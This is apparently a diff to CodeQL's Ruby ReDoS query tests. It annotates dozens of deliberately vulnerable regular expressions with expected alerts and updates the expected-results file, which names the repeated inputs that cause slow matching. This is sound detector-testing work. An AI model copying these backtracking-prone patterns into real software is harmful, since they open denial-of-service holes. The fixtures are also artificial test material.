/(\d+(X\d+)?)+/ 
@@ -182,49 +182,49 @@ good15 = /^([^>]+)*(>|$)/ # NOT GOOD -bad43 = /^([^>a]+)*(>|$)/ +bad43 = /^([^>a]+)*(>|$)/ # $ Alert # NOT GOOD -bad44 = /(\n\s*)+$/ +bad44 = /(\n\s*)+$/ # $ Alert # NOT GOOD -bad45 = /^(?:\s+|#.*|\(\?#[^)]*\))*(?:[?*+]|{\d+(?:,\d*)?})/ +bad45 = /^(?:\s+|#.*|\(\?#[^)]*\))*(?:[?*+]|{\d+(?:,\d*)?})/ # $ Alert # NOT GOOD -bad46 = /\{\[\s*([a-zA-Z]+)\(([a-zA-Z]+)\)((\s*([a-zA-Z]+)\: ?([ a-zA-Z{}]+),?)+)*\s*\]\}/ +bad46 = /\{\[\s*([a-zA-Z]+)\(([a-zA-Z]+)\)((\s*([a-zA-Z]+)\: ?([ a-zA-Z{}]+),?)+)*\s*\]\}/ # $ Alert # NOT GOOD -bad47 = /(a+|b+|c+)*c/ +bad47 = /(a+|b+|c+)*c/ # $ Alert # NOT GOOD -bad48 = /(((a+a?)*)+b+)/ +bad48 = /(((a+a?)*)+b+)/ # $ Alert # NOT GOOD -bad49 = /(a+)+bbbb/ +bad49 = /(a+)+bbbb/ # $ Alert # GOOD good16 = /(a+)+aaaaa*a+/ # NOT GOOD -bad50 = /(a+)+aaaaa$/ +bad50 = /(a+)+aaaaa$/ # $ Alert # GOOD good17 = /(\n+)+\n\n/ # NOT GOOD -bad51 = /(\n+)+\n\n$/ +bad51 = /(\n+)+\n\n$/ # $ Alert # NOT GOOD -bad52 = /([^X]+)*$/ +bad52 = /([^X]+)*$/ # $ Alert # NOT GOOD -bad53 = /(([^X]b)+)*$/ +bad53 = /(([^X]b)+)*$/ # $ Alert # GOOD good18 = /(([^X]b)+)*($|[^X]b)/ # NOT GOOD -bad54 = /(([^X]b)+)*($|[^X]c)/ +bad54 = /(([^X]b)+)*($|[^X]c)/ # $ Alert # GOOD good20 = /((ab)+)*ababab/ @@ -236,13 +236,13 @@ good22 = /((ab)+)*/ # NOT GOOD -bad55 = /((ab)+)*$/ +bad55 = /((ab)+)*$/ # $ Alert # GOOD good23 = /((ab)+)*[a1][b1][a2][b2][a3][b3]/ # NOT GOOD -bad56 = /([\n\s]+)*(.)/ +bad56 = /([\n\s]+)*(.)/ # $ Alert # GOOD - any witness passes through the accept state. good24 = /(A*A*X)*/ 
@@ -251,13 +251,13 @@ good26 = /([^\\\]]+)*/ # NOT GOOD -bad59 = /(\w*foobarbaz\w*foobarbaz\w*foobarbaz\w*foobarbaz\s*foobarbaz\d*foobarbaz\w*)+-/ +bad59 = /(\w*foobarbaz\w*foobarbaz\w*foobarbaz\w*foobarbaz\s*foobarbaz\d*foobarbaz\w*)+-/ # $ Alert # NOT GOOD -bad60 = /(.thisisagoddamnlongstringforstresstestingthequery|\sthisisagoddamnlongstringforstresstestingthequery)*-/ +bad60 = /(.thisisagoddamnlongstringforstresstestingthequery|\sthisisagoddamnlongstringforstresstestingthequery)*-/ # $ Alert # NOT GOOD -bad61 = /(thisisagoddamnlongstringforstresstestingthequery|this\w+query)*-/ +bad61 = /(thisisagoddamnlongstringforstresstestingthequery|this\w+query)*-/ # $ Alert # GOOD good27 = /(thisisagoddamnlongstringforstresstestingthequery|imanotherbutunrelatedstringcomparedtotheotherstring)*-/ 
@@ -269,58 +269,58 @@ #good29 = /foo((\uDC66|\uDC67)|(\uDC68|\uDC69))*foo/ # NOT GOOD (but cannot currently construct a prefix) -bad62 = /a{2,3}(b+)+X/ +bad62 = /a{2,3}(b+)+X/ # $ Alert # NOT GOOD (and a good prefix test) -bad63 = /^<(\w+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/ +bad63 = /^<(\w+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/ # $ Alert # GOOD good30 = /(a+)*[\S\s][\S\s][\S\s]?/ # GOOD - but we fail to see that repeating the attack string ends in the "accept any" state (due to not parsing the range `[^]{2,3}`). -good31 = /(a+)*[\S\s]{2,3}/ +good31 = /(a+)*[\S\s]{2,3}/ # $ Alert # GOOD - but we spuriously conclude that a rejecting suffix exists (due to not parsing the range `[^]{2,}` when constructing the NFA). -good32 = /(a+)*([\S\s]{2,}|X)$/ +good32 = /(a+)*([\S\s]{2,}|X)$/ # $ Alert # GOOD good33 = /(a+)*([\S\s]*|X)$/ # NOT GOOD -bad64 = /((a+)*$|[\S\s]+)/ +bad64 = /((a+)*$|[\S\s]+)/ # $ Alert # GOOD - but still flagged. The only change compared to the above is the order of alternatives, which we don't model. -good34 = /([\S\s]+|(a+)*$)/ +good34 = /([\S\s]+|(a+)*$)/ # $ Alert # GOOD good35 = /((;|^)a+)+$/ # NOT GOOD (a good prefix test) -bad65 = /(^|;)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(e+)+f/ +bad65 = /(^|;)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(e+)+f/ # $ Alert # NOT GOOD -bad66 = /^ab(c+)+$/ +bad66 = /^ab(c+)+$/ # $ Alert # NOT GOOD -bad67 = /(\d(\s+)*){20}/ +bad67 = /(\d(\s+)*){20}/ # $ Alert # GOOD - but we spuriously conclude that a rejecting suffix exists. -good36 = /(([^\/]|X)+)(\/[\S\s]*)*$/ +good36 = /(([^\/]|X)+)(\/[\S\s]*)*$/ # $ Alert # GOOD - but we spuriously conclude that a rejecting suffix exists. 
-good37 = /^((x([^Y]+)?)*(Y|$))/ +good37 = /^((x([^Y]+)?)*(Y|$))/ # $ Alert # NOT GOOD -bad68 = /(a*)+b/ +bad68 = /(a*)+b/ # $ Alert # NOT GOOD -bad69 = /foo([\w-]*)+bar/ +bad69 = /foo([\w-]*)+bar/ # $ Alert # NOT GOOD -bad70 = /((ab)*)+c/ +bad70 = /((ab)*)+c/ # $ Alert # NOT GOOD -bad71 = /(a?a?)*b/ +bad71 = /(a?a?)*b/ # $ Alert # GOOD good38 = /(a?)*b/ @@ -329,54 +329,54 @@ bad72 = /(c?a?)*b/ # NOT GOOD -bad73 = /(?:a|a?)+b/ +bad73 = /(?:a|a?)+b/ # $ Alert # NOT GOOD - but not detected. bad74 = /(a?b?)*$/ # NOT GOOD -bad76 = /PRE(([a-c]|[c-d])T(e?e?e?e?|X))+(cTcT|cTXcTX$)/ +bad76 = /PRE(([a-c]|[c-d])T(e?e?e?e?|X))+(cTcT|cTXcTX$)/ # $ Alert # NOT GOOD - but not detected -bad77 = /^((a)+\w)+$/ +bad77 = /^((a)+\w)+$/ # $ Alert # NOT GOOD -bad78 = /^(b+.)+$/ +bad78 = /^(b+.)+$/ # $ Alert # GOOD good39 = /a*b/ # All 4 bad combinations of nested * and + -bad79 = /(a*)*b/ -bad80 = /(a+)*b/ -bad81 = /(a*)+b/ -bad82 = /(a+)+b/ +bad79 = /(a*)*b/ # $ Alert +bad80 = /(a+)*b/ # $ Alert +bad81 = /(a*)+b/ # $ Alert +bad82 = /(a+)+b/ # $ Alert # GOOD good40 = /(a|b)+/ good41 = /(?:[\s;,"'<>(){}|\[\]@=+*]|:(?![\/\\]))+/ # NOT GOOD -bad83 = /^((?:a{|-)|\w\{)+X$/ -bad84 = /^((?:a{0|-)|\w\{\d)+X$/ -bad85 = /^((?:a{0,|-)|\w\{\d,)+X$/ -bad86 = /^((?:a{0,2|-)|\w\{\d,\d)+X$/ +bad83 = /^((?:a{|-)|\w\{)+X$/ # $ Alert +bad84 = /^((?:a{0|-)|\w\{\d)+X$/ # $ Alert +bad85 = /^((?:a{0,|-)|\w\{\d,)+X$/ # $ Alert +bad86 = /^((?:a{0,2|-)|\w\{\d,\d)+X$/ # $ Alert # NOT GOOD bad87 = /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/ # NOT GOOD -bad88 = /^X(\u0061|a)*Y$/ +bad88 = /^X(\u0061|a)*Y$/ # $ Alert # GOOD good43 = /^X(\u0061|b)+Y$/ # NOT GOOD -bad88 = /X([[:digit:]]|\d)+Y/ +bad88 = /X([[:digit:]]|\d)+Y/ # $ Alert # NOT GOOD -bad89 = /\G(a|\w)*$/ -bad90 = /\b(a|\w)*$/ +bad89 = /\G(a|\w)*$/ # $ Alert +bad90 = /\b(a|\w)*$/ # $ Alert # NOT GOOD; attack: "0".repeat(30) + "!" # Adapated from addressable (https://github.com/sporkmonger/addressable) 
@@ -387,5 +387,5 @@ module Bad91 var_char_class = ALPHA + DIGIT + '_' var_char = "(?:(?:[#{var_char_class}]|%[a-fA-F0-9][a-fA-F0-9])+)" var = "(?:#{var_char}(?:\\.?#{var_char})*)" - bad91 = /^#{var}$/ + bad91 = /^#{var}$/ # $ Alert end diff --git a/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.expected b/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.expected index 79d6c72fa3f5..7d333ca4dbaa 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.expected +++ b/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.expected 
@@ -1,3 +1,32 @@ +#select +| PolynomialReDoS.rb:10:5:10:17 | ... =~ ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:10:5:10:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:11:5:11:17 | ... !~ ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:11:5:11:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:12:5:12:15 | ...[...] | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:12:5:12:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:13:5:13:23 | call to gsub | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:13:5:13:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:14:5:14:20 | call to index | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:14:5:14:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:15:5:15:20 | call to match | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:15:5:15:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. 
| PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:16:5:16:21 | call to match? | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:16:5:16:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:17:5:17:24 | call to partition | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:17:5:17:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:18:5:18:21 | call to rindex | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:18:5:18:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:19:5:19:25 | call to rpartition | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:19:5:19:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:20:5:20:19 | call to scan | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:20:5:20:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. 
| PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:21:5:21:20 | call to split | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:21:5:21:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:22:5:22:22 | call to sub | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:22:5:22:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:23:5:23:20 | call to match | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:23:17:23:20 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:24:5:24:21 | call to match? | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:24:18:24:21 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:28:5:28:21 | call to gsub! | PolynomialReDoS.rb:27:9:27:14 | call to params | PolynomialReDoS.rb:28:5:28:5 | a | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:27:9:27:14 | call to params | user-provided value | +| PolynomialReDoS.rb:30:5:30:18 | call to slice! 
| PolynomialReDoS.rb:29:9:29:14 | call to params | PolynomialReDoS.rb:30:5:30:5 | b | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:29:9:29:14 | call to params | user-provided value | +| PolynomialReDoS.rb:32:5:32:20 | call to sub! | PolynomialReDoS.rb:31:9:31:14 | call to params | PolynomialReDoS.rb:32:5:32:5 | c | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:31:9:31:14 | call to params | user-provided value | +| PolynomialReDoS.rb:42:5:45:7 | case ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:42:10:42:13 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:47:5:50:7 | case ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:47:10:47:13 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:48:14:48:16 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:62:5:62:22 | call to gsub | PolynomialReDoS.rb:54:12:54:17 | call to params | PolynomialReDoS.rb:62:5:62:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:56:31:56:33 | \\s+ | regular expression | PolynomialReDoS.rb:54:12:54:17 | call to params | user-provided value | +| PolynomialReDoS.rb:66:5:66:34 | call to match? | PolynomialReDoS.rb:54:12:54:17 | call to params | PolynomialReDoS.rb:66:5:66:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. 
| PolynomialReDoS.rb:58:30:58:32 | \\s+ | regular expression | PolynomialReDoS.rb:54:12:54:17 | call to params | user-provided value | +| PolynomialReDoS.rb:77:5:77:22 | call to gsub | PolynomialReDoS.rb:70:12:70:17 | call to params | PolynomialReDoS.rb:77:5:77:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:72:28:72:30 | \\s+ | regular expression | PolynomialReDoS.rb:70:12:70:17 | call to params | user-provided value | +| PolynomialReDoS.rb:105:5:105:23 | ... =~ ... | PolynomialReDoS.rb:103:12:103:17 | call to params | PolynomialReDoS.rb:105:5:105:8 | name | This $@ that depends on a $@ may run slow on strings starting with '''' and with many repetitions of ' '. | PolynomialReDoS.rb:100:397:100:399 | \\s* | regular expression | PolynomialReDoS.rb:103:12:103:17 | call to params | user-provided value | +| PolynomialReDoS.rb:105:5:105:23 | ... =~ ... | PolynomialReDoS.rb:103:12:103:17 | call to params | PolynomialReDoS.rb:105:5:105:8 | name | This $@ that depends on a $@ may run slow on strings starting with '''' and with many repetitions of ' '. | PolynomialReDoS.rb:100:405:100:407 | \\s* | regular expression | PolynomialReDoS.rb:103:12:103:17 | call to params | user-provided value | +| lib/index.rb:4:13:4:26 | call to match | lib/index.rb:2:11:2:11 | x | lib/index.rb:4:13:4:13 | x | This $@ that depends on a $@ may run slow on strings with many repetitions of 'a'. | lib/index.rb:4:22:4:23 | a+ | regular expression | lib/index.rb:2:11:2:11 | x | library input | +| lib/index.rb:9:15:9:28 | call to match | lib/index.rb:8:13:8:13 | x | lib/index.rb:9:15:9:15 | x | This $@ that depends on a $@ may run slow on strings with many repetitions of 'a'. 
| lib/index.rb:9:24:9:25 | a+ | regular expression | lib/index.rb:8:13:8:13 | x | library input | +| lib/index.rb:11:16:11:276 | call to match | lib/index.rb:8:13:8:13 | x | lib/index.rb:11:16:11:16 | x | This $@ that depends on a $@ may run slow on strings starting with 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC' and with many repetitions of 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC'. | lib/index.rb:11:271:11:272 | .* | regular expression | lib/index.rb:8:13:8:13 | x | library input | edges | PolynomialReDoS.rb:4:5:4:8 | name | PolynomialReDoS.rb:10:5:10:8 | name | provenance | | | PolynomialReDoS.rb:4:5:4:8 | name | PolynomialReDoS.rb:11:5:11:8 | name | provenance | | 
@@ -104,32 +133,3 @@ nodes | lib/index.rb:9:15:9:15 | x | semmle.label | x | | lib/index.rb:11:16:11:16 | x | semmle.label | x | subpaths -#select -| PolynomialReDoS.rb:10:5:10:17 | ... =~ ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:10:5:10:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:11:5:11:17 | ... !~ ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:11:5:11:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:12:5:12:15 | ...[...] | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:12:5:12:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:13:5:13:23 | call to gsub | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:13:5:13:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:14:5:14:20 | call to index | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:14:5:14:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. 
| PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:15:5:15:20 | call to match | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:15:5:15:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:16:5:16:21 | call to match? | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:16:5:16:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:17:5:17:24 | call to partition | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:17:5:17:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:18:5:18:21 | call to rindex | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:18:5:18:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:19:5:19:25 | call to rpartition | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:19:5:19:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. 
| PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:20:5:20:19 | call to scan | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:20:5:20:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:21:5:21:20 | call to split | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:21:5:21:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:22:5:22:22 | call to sub | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:22:5:22:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:23:5:23:20 | call to match | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:23:17:23:20 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:24:5:24:21 | call to match? | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:24:18:24:21 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:28:5:28:21 | call to gsub! 
| PolynomialReDoS.rb:27:9:27:14 | call to params | PolynomialReDoS.rb:28:5:28:5 | a | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:27:9:27:14 | call to params | user-provided value | -| PolynomialReDoS.rb:30:5:30:18 | call to slice! | PolynomialReDoS.rb:29:9:29:14 | call to params | PolynomialReDoS.rb:30:5:30:5 | b | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:29:9:29:14 | call to params | user-provided value | -| PolynomialReDoS.rb:32:5:32:20 | call to sub! | PolynomialReDoS.rb:31:9:31:14 | call to params | PolynomialReDoS.rb:32:5:32:5 | c | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:31:9:31:14 | call to params | user-provided value | -| PolynomialReDoS.rb:42:5:45:7 | case ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:42:10:42:13 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:47:5:50:7 | case ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:47:10:47:13 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:48:14:48:16 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:62:5:62:22 | call to gsub | PolynomialReDoS.rb:54:12:54:17 | call to params | PolynomialReDoS.rb:62:5:62:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. 
| PolynomialReDoS.rb:56:31:56:33 | \\s+ | regular expression | PolynomialReDoS.rb:54:12:54:17 | call to params | user-provided value | -| PolynomialReDoS.rb:66:5:66:34 | call to match? | PolynomialReDoS.rb:54:12:54:17 | call to params | PolynomialReDoS.rb:66:5:66:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:58:30:58:32 | \\s+ | regular expression | PolynomialReDoS.rb:54:12:54:17 | call to params | user-provided value | -| PolynomialReDoS.rb:77:5:77:22 | call to gsub | PolynomialReDoS.rb:70:12:70:17 | call to params | PolynomialReDoS.rb:77:5:77:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:72:28:72:30 | \\s+ | regular expression | PolynomialReDoS.rb:70:12:70:17 | call to params | user-provided value | -| PolynomialReDoS.rb:105:5:105:23 | ... =~ ... | PolynomialReDoS.rb:103:12:103:17 | call to params | PolynomialReDoS.rb:105:5:105:8 | name | This $@ that depends on a $@ may run slow on strings starting with '''' and with many repetitions of ' '. | PolynomialReDoS.rb:100:397:100:399 | \\s* | regular expression | PolynomialReDoS.rb:103:12:103:17 | call to params | user-provided value | -| PolynomialReDoS.rb:105:5:105:23 | ... =~ ... | PolynomialReDoS.rb:103:12:103:17 | call to params | PolynomialReDoS.rb:105:5:105:8 | name | This $@ that depends on a $@ may run slow on strings starting with '''' and with many repetitions of ' '. | PolynomialReDoS.rb:100:405:100:407 | \\s* | regular expression | PolynomialReDoS.rb:103:12:103:17 | call to params | user-provided value | -| lib/index.rb:4:13:4:26 | call to match | lib/index.rb:2:11:2:11 | x | lib/index.rb:4:13:4:13 | x | This $@ that depends on a $@ may run slow on strings with many repetitions of 'a'. 
| lib/index.rb:4:22:4:23 | a+ | regular expression | lib/index.rb:2:11:2:11 | x | library input | -| lib/index.rb:9:15:9:28 | call to match | lib/index.rb:8:13:8:13 | x | lib/index.rb:9:15:9:15 | x | This $@ that depends on a $@ may run slow on strings with many repetitions of 'a'. | lib/index.rb:9:24:9:25 | a+ | regular expression | lib/index.rb:8:13:8:13 | x | library input | -| lib/index.rb:11:16:11:276 | call to match | lib/index.rb:8:13:8:13 | x | lib/index.rb:11:16:11:16 | x | This $@ that depends on a $@ may run slow on strings starting with 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC' and with many repetitions of 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC'. | lib/index.rb:11:271:11:272 | .* | regular expression | lib/index.rb:8:13:8:13 | x | library input | diff --git a/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.qlref 